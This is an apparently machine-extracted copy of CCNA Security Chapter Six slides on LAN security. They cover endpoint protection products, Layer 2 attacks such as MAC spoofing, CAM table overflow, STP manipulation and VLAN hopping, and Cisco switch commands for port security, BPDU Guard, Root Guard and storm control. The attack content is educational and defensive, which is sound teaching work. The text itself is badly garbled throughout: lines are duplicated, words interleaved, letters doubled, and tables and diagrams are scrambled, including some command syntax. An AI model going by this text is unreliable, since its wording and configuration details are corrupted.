Chapter 6 Overview

(1)

CCNA Security

Chapter Six

Securing the Local Area Network

(2)

Lesson Planning

•

• This lesson should take 3-4 hours to present

This lesson should take 3-4 hours to present

•

• The lesson should include lecture,

The lesson should include lecture,

demonstrations, discussions and assessments

•

• The lesson can be taught in person or using

The lesson can be taught in person or using

remote instruction

(3)

Major Concepts

•

• Describe endpoint vulnerabilities and protection

Describe endpoint vulnerabilities and protection

methods

•

• Describe basic Catalyst switch vulnerabilities

Describe basic Catalyst switch vulnerabilities

•

• Configure and verify switch security features,

Configure and verify switch security features,

including port security and storm control

•

• Describe the fundamental security

Describe the fundamental security

considerations of Wireless, VoIP, and SANs

(4)

Lesson Objectives

Upon completion of this lesson, the

Upon completion of this lesson, the successful participant

successful participant

will be able to:

1.

1. Describe endpoint security and the enabling technologiesDescribe endpoint security and the enabling technologies 2.

2. Describe how Cisco IronPort is used tDescribe how Cisco IronPort is used to ensure endpoint securityo ensure endpoint security 3.

3. Describe how Cisco NAC products are used Describe how Cisco NAC products are used to ensure endpointto ensure endpoint security

security 4.

4. Describe how the Cisco Security Agent is Describe how the Cisco Security Agent is used to ensureused to ensure endpoint security

endpoint security 5.

5. Describe the primary considerations for securing the Layer 2Describe the primary considerations for securing the Layer 2 infrastructure

infrastructure 6.

6. Describe MAC address spoofing attacks and MAC addressDescribe MAC address spoofing attacks and MAC address spoofing attack mitigation

(5)

Lesson Objectives

7.

7. Describe MAC Address table overflow attacks and MAC AddressDescribe MAC Address table overflow attacks and MAC Address table overflow attack mitigation

table overflow attack mitigation 8.

8. Describe STP manipulation attacks and STP manipulation attackDescribe STP manipulation attacks and STP manipulation attack mitigation

mitigation 9.

9. Describe LAN Storm attacks and LAN Storm attack mitigationDescribe LAN Storm attacks and LAN Storm attack mitigation 10.

10. Describe VLAN attacks and VLAN attack mitigationDescribe VLAN attacks and VLAN attack mitigation 11.

11. Describe how to configure port securityDescribe how to configure port security 12.

12. Describe how to verify port securityDescribe how to verify port security 13.

13. Describe how to configure and verify BPDU Guard and Root GuardDescribe how to configure and verify BPDU Guard and Root Guard 14.

14. Describe how to configure and verify stDescribe how to configure and verify storm controlorm control 15.

15. Describe and configure Cisco SPANDescribe and configure Cisco SPAN 16.

(6)

Lesson Objectives

17.

17. Describe the best practices for Layer 2 sDescribe the best practices for Layer 2 securityecurity 18.

18. Describe the fundamental aspects of enterprise security for Describe the fundamental aspects of enterprise security for advanced technologies

advanced technologies 19.

19. Describe the fundamental aspects of wireless security and theDescribe the fundamental aspects of wireless security and the enabling technologies

enabling technologies 20.

20. Describe wireless security solutionsDescribe wireless security solutions 21.

21. Describe the fundamental aspects of VoIP security Describe the fundamental aspects of VoIP security and theand the en

enababliling teng techchnonolologigieses ReRefefererencence: CIA: CIAG couG coursrse on VoIe on VoIP secP secururityity.. 22.

22. Describe VoIP security solutionsDescribe VoIP security solutions 23.

23. Describe the fundamental aspects of SAN sDescribe the fundamental aspects of SAN security and theecurity and the enabling technologies

enabling technologies 24.

(7)

Securing the LAN

IPS IPS MARS MARS VPN VPN ACS ACS Iron Port Iron Port Firewall Firewall Web Web Server Server Email Email Server Server DNSDNS LAN LAN Hosts Hosts Perimeter Perimeter Internet Internet Areas of concentration: Areas of concentration: •• SSeeccuurriinng eg ennddppooiinntsts •

• Securing networkSecuring network infrastructure

(8)

Threat Threat Protection Protection Policy Policy Compliance Compliance Infection Infection Containment Containment Secure Secure Host Host

Addressing Endpoint Security

Based on three elements: Based on three elements: •

• Cisco Network Admission Control (NAC)Cisco Network Admission Control (NAC) •

• Endpoint protectionEndpoint protection •

(9)

Operating Systems

Basic Security Services

•

• Trust

Trusted code

ed code and tru

and trusted pa

sted path –

th – ensur

ensures that

es that the int

the integrit

egrity

y

of the operating system is not violated

•

• Privi

Privileged

leged conte

context of e

xt of executi

xecution –

on – provi

provides id

des identit

entity

y

authenticatio

authentication and certain privileges based

n and certain privileges based on the identity

on the identity

•

• Proce

Process memo

ss memory prot

ry protectio

ection and i

n and isolati

solation –

on – provi

provides

des

separation from other users and their data

•

• Access control to re

Access control to resources –

sources – ensures confident

ensures confidentiality and

iality and

integrity of data

(10)

Types of Application Attacks

I have gained direct I have gained direct

access to this access to this

application’s privileges application’s privileges

I have gained access to I have gained access to

this system which is this system which is trusted by the other trusted by the other system, allowing me to system, allowing me to access it. access it. Indirect Indirect Direct Direct

(11)

Cisco Systems Endpoint

Security Solutions

Cisco NAC Cisco NAC IronPort IronPort Cisco Security Agent

(12)

Cisco IronPort Products

Iro

IronPonPortrt proproducducts incts includlude:e:

•• E-mE-mail sail securecurity aity applpplianiances foces for virr virusus and spam control

and spam control

•• WWeb seceb securiurity apty applipliancance for spe for spywaywarere filtering, URL filtering, and anti-malware filtering, URL filtering, and anti-malware •• SecSecuriurity mty manaanagemgement ent appapplialiancence

(13)

IronPort C-Series

Internet Internet Internet Internet Antispam Antispam Antivirus Antivirus Policy Enforcement Policy Enforcement Mail Routing Mail Routing Before IronPort Before IronPort IronPort E-mail

IronPort E-mail Security ApplianceSecurity Appliance Firewall Firewall Groupware Groupware Users Users After IronPort After IronPort Users Users Groupware Groupware Firewall Firewall Encryption Platform Encryption Platform MTA MTA DLP DLP Scanner Scanner DLP Policy DLP Policy Manager Manager

(14)

IronPort S-Series

Web Proxy Web Proxy Antispyware Antispyware Antivirus Antivirus Antiphishing Antiphishing URL Filtering URL Filtering Policy Management Policy Management Firewall Firewall Users Users Users Users Firewall Firewall IronPort IronPort S-Series Series B

Beeffoorre e IIrroonnPPoorrtt AAfftteer r IIrroonnPPoorrtt Internet

Internet Internet

(15)

Cisco NAC

NAC Framework NAC Framework •

• Software moduleSoftware module

embedded within embedded within NAC-enabled products

enabled products •

• Integrated frameworkIntegrated framework leveraging multiple Cisco leveraging multiple Cisco and NAC-aware vendor and NAC-aware vendor products

products

•

• In-band Cisco NACIn-band Cisco NAC Appliance solution can Appliance solution can

be used on any switch or be used on any switch or router platform

router platform •

• Self-contained, turnkeySelf-contained, turnkey solution

solution

The purpose of

The purpose of NAC

NAC

::



Allow only authorized and comp

Allow only authorized and compliant systems to

liant systems to

access the network



To enforce network security policy

Cisco NAC Appliance Cisco NAC Appliance

(16)

The NAC Framework

AAA AAA Server Server Credentials Credentials Credentials Credentials EAP/UDP, EAP/UDP, EAP/802.1x EAP/802.1x RADIUS RADIUS Credentials Credentials HTTPS HTTPS Access Rights Access Rights Notification Notification Cisco Cisco Trust Trust Agent

Agent Comply?Comply?

Vendor Vendor Servers Servers Hosts Attempting Hosts Attempting Network Access Network Access Network Network Access Access Devices

Devices Policy Server Policy Server Decision Points Decision Points and Remediation and Remediation Enforcement Enforcement

(17)

NAC Components

•

• Cisco NAS

Cisco NAS

Serves as an in-band or Serves as an in-band or out-of-band device for network access band device for network access control

control

•

• Cisco NAM

Cisco NAM

Centralizes management for Centralizes management for administrators, support

administrators, support personnel, and operators personnel, and operators

•

• Cisco NAA

Cisco NAA

Optional lightweight client for Optional lightweight client for device-based registry scans in device-based registry scans in unmanaged environments

unmanaged environments

•

• Rule-set updates

Rule-set updates

Scheduled automatic updates Scheduled automatic updates for antivirus, critical hotfixes, for antivirus, critical hotfixes, and other applications

and other applications

M M G G R R

(18)

Cisco NAC Appliance Process

THE GOAL THE GOAL Intranet/ Intranet/ Network Network 2. 2. Host isHost is

redirected to a login page. redirected to a login page.

Cisco NAC Appliance validates

username and password, also

performs device and network scans

to assess vulnerabilities on device.

Device is noncompliant Device is noncompliant or login is incorrect. or login is incorrect.

Host is denied access and assigned

to a quarantine role with access to

to a quarantine role with access to onlineonline

remediation resources. remediation resources. 3a. 3a. 3b.3b. Device is “clean”. Device is “clean”.

Machine gets on “certified

devices list” and is granted

access to network. access to network. Cisco NAS Cisco NAS Cisco NAM Cisco NAM 1.

1. Host attempts to access a web page or usHost attempts to access a web page or useses an optional client.

an optional client.

Network access is blocked until wired or wireless

host provides login information.

host provides login information. _{Authentication}_{Authentication}

Server Server M M G G R R Quarantine Quarantine Role Role 3.

3. The host is authenticated and optionallyThe host is authenticated and optionally scanned for posture compliance

(19)

Access Windows

4. 4. Login Login Screen Screen Scan is performed Scan is performed

(types of checks depend on user role) (types of checks depend on user role)

Scan fails Scan fails Remediate

(20)

CSA Architecture

Management Center for Management Center for

Cisco Security Agent Cisco Security Agent with Internal or External with Internal or External

Database Database Security Security Policy Policy Server Protected by Server Protected by Cisco Security Agent Cisco Security Agent Administration Administration Workstation Workstation SSL SSL Events Events Alerts Alerts

(21)

CSA Overview

State

State Rules andRules and

Policies Policies Rules Rules Engine Engine Correlation Correlation Engine Engine File System File System Interceptor Interceptor Network Network Interceptor Interceptor Configuration Configuration Interceptor Interceptor Execution Execution Space Space Interceptor Interceptor Application Application Allowed Allowed Request Request Blocked Blocked Request Request

(22)

CSA Functionality

Security Application

Security Application NetworkNetwork

Interceptor Interceptor File System File System Interceptor Interceptor Configuration Configuration Interceptor Interceptor Execution Execution Space Space Interceptor Interceptor D

Diissttrriibbuutteed d FFiirreewwaallll XX _―_― _―_― _―_― Host Intrusion Host Intrusion Prevention Prevention XX ― ― ―― XX Application Application Sandbox Sandbox ―― XX XX XX Network Worm Network Worm Prevention Prevention XX ― ― ―― XX

File Integrity Monitor

(23)

Attack Phases

–

– File system interceptor File system interceptor –

– Network interceptor Network interceptor –

– Configuration Configuration interceptor interceptor –

– Execution spaceExecution space interceptor interceptor Server Server Protected by Protected by Cisco Security Cisco Security Agent Agent –

– Probe phaseProbe phase •• PPiinng g sscacannss •• PPoorrt t scscaannss –

– Penetrate phasePenetrate phase •• TTraransnsfefer r exexplploioitt

code to target code to target –

– Persist phasePersist phase

•• InInststalall nl new ew cocodede •• MMooddiiffyy

configuration configuration –

– Propagate phaPropagate phasese •• AAttttacack k ototheher r

targets targets –

– Paralyze phaseParalyze phase •• EErraase se ffiilleess •• CCrarash sh sysyststemem •• SStteeaal l ddaattaa

(24)

CSA Log Messages

(25)

IPS IPS MARS MARS VPN VPN ACS ACS Iron Port Iron Port Firewall Firewall Web Web Server Server Email Email Server Server DNSDNS Hosts Hosts Perimeter Perimeter Internet Internet

Layer 2 Security

(26)

OSI Model

MAC Addresses

MAC Addresses When it comes to networking, Layer 2 is

When it comes to networking, Layer 2 is often a very weak link.often a very weak link.

Physical Links

IP Addresses

Protocols and Ports

Application Stream Application Stream Application Application Presentation Presentation Session Session Transport Transport Network Network Data Link Data Link Physical Physical C C o o m m p p r r o o m m i i s s e e d d Application Application Presentation Presentation Session Session Transport Transport Network Network Data Link Data Link Physical Physical Initial Compromise Initial Compromise

(27)

MAC Address Spoofing Attack

MAC MAC Address: Address: AABBcc AABBcc AABBcc

AABBcc 12AbDd12AbDd

Switch Port Switch Port 1 1 22 MAC Address: MAC Address: AABBcc

AABBcc Attacker Attacker Port 1 Port 1 Port 2 Port 2 MAC MAC Address: Address: 12AbDd 12AbDd

I have associated Ports 1 and 2 with I have associated Ports 1 and 2 with the MAC addresses of the devices the MAC addresses of the devices

attached. T

attached. Traffic destined fraffic destined for eachor each device will

device will be forwarded directlybe forwarded directly..

The switch keeps track of the The switch keeps track of the endpoints by maintaining a endpoints by maintaining a MAC address table. In MAC MAC address table. In MAC spoofing, the attacker poses spoofing, the attacker poses as another host—in this case, as another host—in this case, AABBcc

(28)

MAC Address Spoofing Attack

MAC MAC Address: Address: AABBcc AABBcc AABBcc AABBcc Switch Port Switch Port 1 1 22 MAC Address: MAC Address: AABBcc AABBcc Attacker Attacker Port 1

Port 1 _{Port 2}_{Port 2}

AABBcc AABBcc 1

1 22

I have changed the MAC I have changed the MAC address on my computer address on my computer to match the server.

to match the server.

The device with MAC The device with MAC address AABBcc has address AABBcc has

changed locations to Port2. changed locations to Port2. I must adjust my MAC

I must adjust my MAC

address table accordingly. address table accordingly.

(29)

MAC Address Table Overflow Attack

The switch can forward frames between PC1 and PC2 without The switch can forward frames between PC1 and PC2 without flooding because the MAC address table contains

flooding because the MAC address table contains port-to-MAC- port-to-MAC-address mappings in the MAC port-to-MAC-address table for these PCs.

(30)

MAC Address Table Overflow Attack

A

A BB

C

C DD

VLAN 10

VLAN 10 _{VLAN 10}_{VLAN 10}

Intruder runs

Intruder runs macofmacof to begin sending to begin sending unknown bogus MAC unknown bogus MAC addresses. addresses. 3/25 3/25 3/25 MAC X 3/25 MAC X 3/25 MAC Y 3/25 MAC Y 3/25 MAC Z 3/25 MAC Z XYZ XYZ flood flood MAC Port MAC Port X 3/25 X 3/25 Y 3/25 Y 3/25 C 3/25 C 3/25

Bogus addresses are Bogus addresses are added to the CAM added to the CAM table. CAM table is full. table. CAM table is full.

Host C Host C

The switch floods The switch floods the frames.

the frames.

Attacker sees traf Attacker sees trafficfic

to servers B and D. to servers B and D. VLAN 10 VLAN 10 1 1 2 2 3 3 4 4

(31)

STP Manipulation Attack

•

• Spanning tree protocol

Spanning tree protocol

operates by electing a

root bridge

•

• STP builds a tree topology

STP builds a tree topology

•

• STP manipulation

STP manipulation

changes the topology of a

network—the attacking

host appears to be the

root bridge

F F FF F F FF F F BB Root Bridge Root Bridge Priority = 8192 Priority = 8192 MAC Address= MAC Address= 0000.00C0.1234 0000.00C0.1234

(32)

STP Manipulation Attack

Root Bridge Root Bridge Priority = 8192 Priority = 8192 Root Root Bridge Bridge F F FF F F FF F F BB F F BB F F F F F F FF Attacker

Attacker The attacking host broadcasts out STPThe attacking host broadcasts out STP

configuration and topology change BPDUs. configuration and topology change BPDUs. This is an attempt to f

This is an attempt to force spanning treeorce spanning tree recalculations.

(33)

LAN Storm Attack

•

• Broadcast, multicast, or unicast packets Broadcast, multicast, or unicast packets are flooded on all ports in theare flooded on all ports in the same VLAN.

same VLAN. •

• These storms can increase the CPU utilizatThese storms can increase the CPU utilization on a switch to 100%,ion on a switch to 100%, reducing the performance of the network.

reducing the performance of the network.

Broadcast Broadcast Broadcast Broadcast Broadcast Broadcast Broadcast Broadcast Broadcast Broadcast Broadcast Broadcast

(34)

Storm Control

Total Total number of number of broadcast broadcast packets packets or bytes or bytes

(35)

VLAN Attacks

VLAN = Broadcast Domain = Logical Network (Subnet)

  SegmentationSegmentation   FlexibilityFlexibility   SecuritySecurity

(36)

VLAN Attacks

802.1Q 802.1Q Server Server

Attacker sees traffic destined for servers Attacker sees traffic destined for servers

Server Server Trunk Trunk VLAN VLAN 20 20 VLAN VLAN 10 10

A

A VLAN hopping at

VLAN hopping attack can be lau

tack can be launched in two ways:

nched in two ways:

•

• Spoofing DTP Messages from the attacking host to

Spoofing DTP Messages from the attacking host to

cause the switch to enter trunking mode

•

(37)

The second switch

receives the packet, on

the native VLAN

Double-Tagging VLAN Attack

Attacker on

VLAN 10, but puts a 20

tag in the packet

Victim Victim (VLAN 20) (VLAN 20) Note: This attack works only if the

Note: This attack works only if the trunk has the same native trunk has the same native VLAN as

VLAN as the attackerthe attacker..

The first switch strips off the first tag and

does not retag it (native traffic is not

retagged). It then forwards the packet to

switch 2. switch 2. 20 20 Trunk Trunk (Native VLAN = 10) (Native VLAN = 10) 802.1Q, Frame 802.1Q, Frame 1 1 2 2 3 3 4 4

The second switch

examines the packet, sees

the VLAN 20 tag and

forwards it

(38)

Port Security Overview

MAC A MAC A

Port 0/1 allows

Port 0/1 allows MAC AMAC A Port 0/2 allows MAC B Port 0/2 allows MAC B Port 0/3 allows MAC C Port 0/3 allows MAC C

Attacker 1 Attacker 1 Attacker 2 Attacker 2 0/1 0/1 0/2 0/2 0/3 0/3 MAC F MAC F Allows

Allows an administrator to statically specify MACan administrator to statically specify MAC Addresses for a port or to permit the switch to Addresses for a port or to permit the switch to

dynamically learn a limited number of MAC dynamically learn a limited number of MAC addresses

(39)

CLI Commands

switchport mode access switchport mode access Switch(config-if)#

Switch(config-if)#

•

• Sets the interface mode as access

Sets the interface mode as access

switchport port-security switchport port-security Switch(config-if)#

Switch(config-if)#

•

• Enables port security on the

Enables port security on the interface

interface

switchport port-security maximum

switchport port-security maximum valuevalue

Switch(config-if)# Switch(config-if)#

•

• Sets the maximum number of secure

Sets the maximum number of secure MAC addresses for

MAC addresses for

the interface (optional)

(40)

Switchport Port-Security Parameters

P

Paarraammeetteerr DDeessccrriippttiioonn

mac-address

mac-address mac-addressmac-address (Optional) Specify a secure MAC address for the port by entering a 48-bit MAC (Optional) Specify a secure MAC address for the port by entering a 48-bit MAC aaddress. Yaaddress. You can add additionalou can add additional secure MAC addresses up to the maximum

secure MAC addresses up to the maximum value configured.value configured. vlan

vlan vlan-id vlan-id (Optional) On a trunk port only, specify the VLAN ID and the MAC address. If no VLAN (Optional) On a trunk port only, specify the VLAN ID and the MAC address. If no VLAN ID is specified, the nativeID is specified, the native VLAN is used.

VLAN is used. vlan access

vlan access (Optional) On an access port (Optional) On an access port onlyonly, specify the VLAN , specify the VLAN as an access VLAN.as an access VLAN. vlan voice

vlan voice (Optional) On an access port (Optional) On an access port onlyonly, specify the VLAN , specify the VLAN as a voice as a voice VLANVLAN mac-address

mac-address stickysticky

[

[mac-addressmac-address]]

(Optional) Enable the interface for sticky learning by entering only the

(Optional) Enable the interface for sticky learning by entering only the mac-mac-addreaddress ss sticstickyky keywords. When stickykeywords. When sticky learning is enabled, the interface adds all secure MAC addresses that are

learning is enabled, the interface adds all secure MAC addresses that are dynamically learned to the runningdynamically learned to the running configuration and converts these addresses to sticky secure MAC addresses.

configuration and converts these addresses to sticky secure MAC addresses. Specify a sticky secure MAC address by entering the mac-address

Specify a sticky secure MAC address by entering the mac-address sticky mac-address keywords..sticky mac-address keywords.. maximum

maximum valuevalue (Optional) Set the maximum number of (Optional) Set the maximum number of secure MAC addresses for the interface. The maximum secure MAC addresses for the interface. The maximum number of securenumber of secure MAC addresses that you can configure on a

MAC addresses that you can configure on a switch is set by the maximum number switch is set by the maximum number of available MACof available MAC addresses allowed in the system. The active Switch Database Management (SDM)

addresses allowed in the system. The active Switch Database Management (SDM) template determines thistemplate determines this number. This number represents the total of available MAC addresses, including those used for other Layer 2 number. This number represents the total of available MAC addresses, including those used for other Layer 2 functions and any other secure MAC addresses configured on interfaces.

functions and any other secure MAC addresses configured on interfaces. The default setting is 1.

The default setting is 1. vlan

vlan [[vlan-listvlan-list]] (Optional) For trunk ports, you can set the maximum (Optional) For trunk ports, you can set the maximum number of secure MAC addresses on number of secure MAC addresses on a VLAN. If thea VLAN. If the vlanvlan keyword is not entered, the default value is used.

keyword is not entered, the default value is used.

n

n vlan:vlan: set a per-VLAN maximum value.set a per-VLAN maximum value. n

n vlanvlanvlan-list vlan-list :: set a per-VLAN maximum set a per-VLAN maximum value on a range of VLANs separated by value on a range of VLANs separated by a hyphen or a series of a hyphen or a series of

VLANs separated by commas. For

(41)

Port Security Violation Configuration

switchport port-security mac-address sticky switchport port-security mac-address sticky Switch(config-if)#

Switch(config-if)#

•

• Enables sticky learning

Enables sticky learning on the interface (optional)

on the interface (optional)

switchport port-security violation {protect | switchport port-security violation {protect | restrict | shutdown}

restrict | shutdown} Switch(config-if)# Switch(config-if)#

•

• Sets the violation mode (optional)

Sets the violation mode (optional)

switchport port-security mac-address

switchport port-security mac-address mac-addressmac-address

•

• Enters a static secure MAC address

Enters a static secure MAC address for the interface

for the interface

(optional)

(42)

Switchport Port-Security Violation

Parameters

P

Paarraammeetteerr DDeessccrriippttiioonn protect

protect (Optional) Set the security violation protect mode. When the number of secure MAC(Optional) Set the security violation protect mode. When the number of secure MAC addresses reaches the limit allowed on the port, packets with unknown source

addresses reaches the limit allowed on the port, packets with unknown source

addresses are dropped until you remove a sufficient number of secure MAC addresses addresses are dropped until you remove a sufficient number of secure MAC addresses or increase the number of

or increase the number of maximum allowable addresses. Ymaximum allowable addresses. You are not notified that aou are not notified that a security violation has occurred.

security violation has occurred. restrict

restrict (Optional) Set the security violation restrict mode. When the number of secure MAC(Optional) Set the security violation restrict mode. When the number of secure MAC addresses reaches the limit allowed on the port, packets with unknown source addresses reaches the limit allowed on the port, packets with unknown source

addresses are dropped until you remove a sufficient number of secure MAC addresses addresses are dropped until you remove a sufficient number of secure MAC addresses or increase the number of maximum allowable addresses. In this mode, y

or increase the number of maximum allowable addresses. In this mode, you are notifiedou are notified that a security violation has occurred.

that a security violation has occurred. shutdown

shutdown (Optional) Set the security violation shutdown mode. In this mode, a port security(Optional) Set the security violation shutdown mode. In this mode, a port security violation causes the interface to

violation causes the interface to immediately become error-disabled and turns off theimmediately become error-disabled and turns off the port LED. It also sends an SNMP trap, logs a syslog mess

port LED. It also sends an SNMP trap, logs a syslog message, and increments theage, and increments the violation counter

violation counter. When a secure port . When a secure port is in the is in the error-disabled state, you can bring it error-disabled state, you can bring it outout of this state by entering the

of this state by entering the errdisable errdisable recovery recovery causecause psecure-violatiopsecure-violationn globalglobal configuration command, or you can manually re-enable it by entering the

configuration command, or you can manually re-enable it by entering the shutdownshutdown andand no shut down

no shut down interface configuration commands.interface configuration commands. shutdown

shutdown vlan

vlan

Set the security violation mode to per-VLAN shutdown. In this mode, only the VLAN Set the security violation mode to per-VLAN shutdown. In this mode, only the VLAN onon which the violation occurred is error-disabled.

(43)

Port Security Aging Configuration

switchport port-security aging {static | time

switchport port-security aging {static | time timetime ||

type {absolute | inactivity}} type {absolute | inactivity}} Switch(config-if)#

Switch(config-if)#

•

• Enables or disables static aging for the secure port or

Enables or disables static aging for the secure port or

sets the aging time or type

•

• The aging command allows MAC-Addresses on the

The aging command allows MAC-Addresses on the

Secure switchport to be deleted after the set aging

Secure switchport to be deleted after the set aging time

time

•

• This helps to avoid a

This helps to avoid a situation where obsolete MAC-

situation where obsolete

MAC- Address occupy the ta

Address occupy the table and saturates

ble and saturates causing a

causing a

violation (when the max number exceeds)

(44)

Switchport Port-Security

Aging Parameters

P

static

static Enable aging for statically configured secureEnable aging for statically configured secure addresses on this port.

addresses on this port.

time

time timetime _{Specify the aging time for this port. The range}_{Specify the aging time for this port. The range is 0 to}_{is 0 to}

1440 minutes. If the time is

1440 minutes. If the time is 0, aging is disabled for 0, aging is disabled for this port.

this port.

type absolute

type absolute Set absolute aging type. All the secure Set absolute aging type. All the secure addressesaddresses on this port age out exactly after the time (minutes) on this port age out exactly after the time (minutes) specified and are removed from the secure

specified and are removed from the secure addressaddress list.

list.

type inactivity

type inactivity Set the inactivity aging type. The secure addressesSet the inactivity aging type. The secure addresses on this port age out only if there is no

on this port age out only if there is no data trafficdata traffic from the secure source address for the specified from the secure source address for the specified time period.

(45)

Typical Configuration

switchport mode access switchport mode access switchport port-security switchport port-security

switchport port-security maximum

switchport port-security maximum 22

switchport port-security violation shutdown switchport port-security violation shutdown switchport port-security mac-address sticky switchport port-security mac-address sticky switchport port-security aging time 120

switchport port-security aging time 120 Switch(config-if)# Switch(config-if)# S2 S2 PC B PC B

(46)

CLI Commands

sw-class#

sw-class# show port-securityshow port-security

Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action

(Count)

(Count) (Count) (Count) (Count)(Count)

---Fa0/12

Fa0/12 2 2 0 0 0 0 ShutdownShutdown ---Total

Total Addresses Addresses in in System System (excluding (excluding one one mac mac per per port) port) : : 00 Max Addresses limit in System (exc

Max Addresses limit in System (excluding one luding one mac per port) : 1024mac per port) : 1024 sw-class#

sw-class# show port-security interface f0/12show port-security interface f0/12

Port

Port Security Security : : EnabledEnabled Port

Port status status : : Secure-downSecure-down Violation m

Violation mode ode : Shutdown: Shutdown Maximum MAC

Maximum MAC Addresses Addresses : 2: 2 Total

Total MAC MAC Addresses Addresses : : 11 Configured

Configured MAC MAC Addresses Addresses : : 00 Aging time

Aging time : 120 mins: 120 mins Aging type

Aging type : Absolute: Absolute SecureStati

SecureStatic address aging c address aging : Disabled: Disabled Security

(47)

View Secure MAC Addresses

sw-class#

sw-class# show port-security addressshow port-security address

Secure Mac Address Table Secure Mac Address Table

--- Vlan

Vlan Mac Address Mac Address Type Type Ports Ports Remaining AgeRemaining Age (mins)

(mins)

--- --- --- --- --- -1

1 0000.ffff.aaaa 0000.ffff.aaaa SecureConfigured SecureConfigured Fa0/12 Fa0/12 -

- ---Total

Total Addresses Addresses in in System System (excluding (excluding one one mac mac per per port) port) : : 00 Max Addresses limit in System (excluding one mac per port) : 1024 Max Addresses limit in System (excluding one mac per port) : 1024

(48)

MAC Address Notification

MAC address notification

MAC address notification allows allows monitoring monitoring of of the the MACMAC

addresses, at the module and port level, added by the switch addresses, at the module and port level, added by the switch or removed from the CAM table for secure ports.

or removed from the CAM table for secure ports. NMS NMS MAC A MAC A MAC B MAC B F1/1 = MAC A F1/1 = MAC A F1/2 = MAC B F1/2 = MAC B F2/1 = MAC D F2/1 = MAC D (address ages out) (address ages out) Switch

Switch CAM TCAM Tableable SNMP traps sent to SNMP traps sent to NMS when new MAC NMS when new MAC addresses appear or addresses appear or when old ones time out. when old ones time out.

MAC D is away MAC D is away from the network. from the network. F1/2 F1/2 F1/1 F1/1 F2/1 F2/1

(49)

Configure Portfast

C

Coommmmaanndd DDeessccrriippttiioonn Switch(config-if)#

Switch(config-if)# spanning- spanning-tree portfast

tree portfast

Enables PortFast on a Layer 2 access port and forces Enables PortFast on a Layer 2 access port and forces it toit to

enter the

enter the forwarding stateimmediatelyforwarding stateimmediately.. Switch(config-if)#

Switch(config-if)# nono

spanning-tree portfast spanning-tree portfast

Disables PortFast on a Layer 2 access port. PortFast is Disables PortFast on a Layer 2 access port. PortFast is

disabled by default. disabled by default. Switch(config)#

Switch(config)# spanning-treespanning-tree portfast default

portfast default

Globally enables the PortFast feature on all

Globally enables the PortFast feature on all nontrunkingnontrunking ports.

ports. Switch#

Switch# show running-configshow running-config interface

interface type slot/porttype slot/port

Indicates whether PortFast has been configured on

Indicates whether PortFast has been configured on a port.a port. S

(50)

BPDU Guard

Switch(config)# Switch(config)#

spanning-tree portfast bpduguard default spanning-tree portfast bpduguard default

•

• Globally enables BPDU guard on all

Globally enables BPDU guard on all ports with PortFast

ports with PortFast

enabled

F F FF F F F F F F BB Root Root Bridge Bridge BPDU BPDU Guard Guard Enabled Enabled Attacker

(51)

Display the State of Spanning Tree

Switch#

Switch# show spanning-tree summary totalsshow spanning-tree summary totals

Root bridge for: none. Root bridge for: none.

PortFast BPDU Guard is enabled PortFast BPDU Guard is enabled UplinkFast is disabled

UplinkFast is disabled BackboneFast is disabled BackboneFast is disabled

Spanning tree default pathcost method used is short Spanning tree default pathcost method used is short Name

Name Blocking Blocking Listening Listening Learning Learning Forwarding Forwarding STP STP ActiveActive --- --- --- --- --- --- -1 1 VLAN VLAN 0 0 0 0 0 0 1 1 11 <output omitted> <output omitted>

(52)

Root Guard

spanning-tree guard root spanning-tree guard root

•

• Enables root guard on a

Enables root guard on a per-interface basis

per-interface basis

Root Bridge Root Bridge Priority = 0 Priority = 0 MAC Address = MAC Address = 0000.0c45.1a5d 0000.0c45.1a5d F F FF F F FF F F BB F F STP BPDU STP BPDU Priority = 0 Priority = 0 MAC Address = MAC Address = 0000.0c45.1230000.0c45.12344 Root Root Guard Guard Enabled Enabled Attacker Attacker

(53)

Verify Root Guard

Switch#

Switch# show spanning-tree inconsistentportsshow spanning-tree inconsistentports

Name

Name Interface Interface InconsistencyInconsistency

--- --- --- -VLAN0001

VLAN0001 FastEthernet3/1 FastEthernet3/1 Port Port Type Type InconsistentInconsistent VLAN0001

VLAN1005 FastEthernet3/2 FastEthernet3/2 Port Port Type Type InconsistentInconsistent Number of inconsistent ports (segments) in the system :10

(54)

Storm Control Methods

•

• Bandwidth as a percentage of the total available

Bandwidth as a percentage of the total available

bandwidth of the port that can be used

bandwidth of the port that can be used by the broadcast,

by the broadcast,

multicast, or unicast traffic

•

• Traffic rate in packets per second

Traffic rate in packets per second at which broadcast,

at which broadcast,

multicast, or unicast packets are received

•

• Traffic rate in bits per second at

Traffic rate in bits per second at which broadcast,

which broadcast,

multicast, or unicast packets are received

•

• Traffic rate in packets per second and for small frames.

Traffic rate in packets per second and for small frames.

This feature is enabled globally. The threshold for small

frames is configured for each interface.

(55)

Storm Control Configuration

•

• Enables storm control

Enables storm control

•

• Specifies the level at which

Specifies the level at which it is enabled

it is enabled

•

• Specifies the action that should take place

Specifies the action that should take place when the

when the

threshold (level) is reached, in

threshold (level) is reached, in addition to filtering traffic

addition to filtering traffic

Switch(config-if)# storm-control broadcast level 75.5 Switch(config-if)# storm-control broadcast level 75.5 Switch(config-if)# storm-control multicast level pps Switch(config-if)# storm-control multicast level pps

2k 1k 2k 1k

Switch(config-if)# storm-control action shutdown Switch(config-if)# storm-control action shutdown

(56)

Storm Control Parameters

P

broadcast

broadcast This parameter enables broadcast storm control This parameter enables broadcast storm control on the interface.on the interface.

multicast

multicast This parameter enables multicast storm control on This parameter enables multicast storm control on the interface.the interface.

unicast

unicast This parameter enables unicast storm control on This parameter enables unicast storm control on the interface.the interface.

level

level levellevel [[level-low level-low ]] Rising and falling suppression levels Rising and falling suppression levels as a percentage of total bandwidth of the port.as a percentage of total bandwidth of the port. •

• level level : Rising suppression level. The range : Rising suppression level. The range is 0.00 to 100.00. Block the flooding of is 0.00 to 100.00. Block the flooding of storm packets when the value specified for level is reached.

storm packets when the value specified for level is reached. •

• level-low: level-low: (Optional) Falling suppression level, up to (Optional) Falling suppression level, up to two decimal places. Thistwo decimal places. This value must be less than or

value must be less than or equal to the rising suppression value.equal to the rising suppression value.

level bps

level bps bpsbps [[bps-low bps-low ]] Specify the rising and falling suppression levels Specify the rising and falling suppression levels as a rate in bits per second at whichas a rate in bits per second at which traffic is received on the port.

traffic is received on the port. •

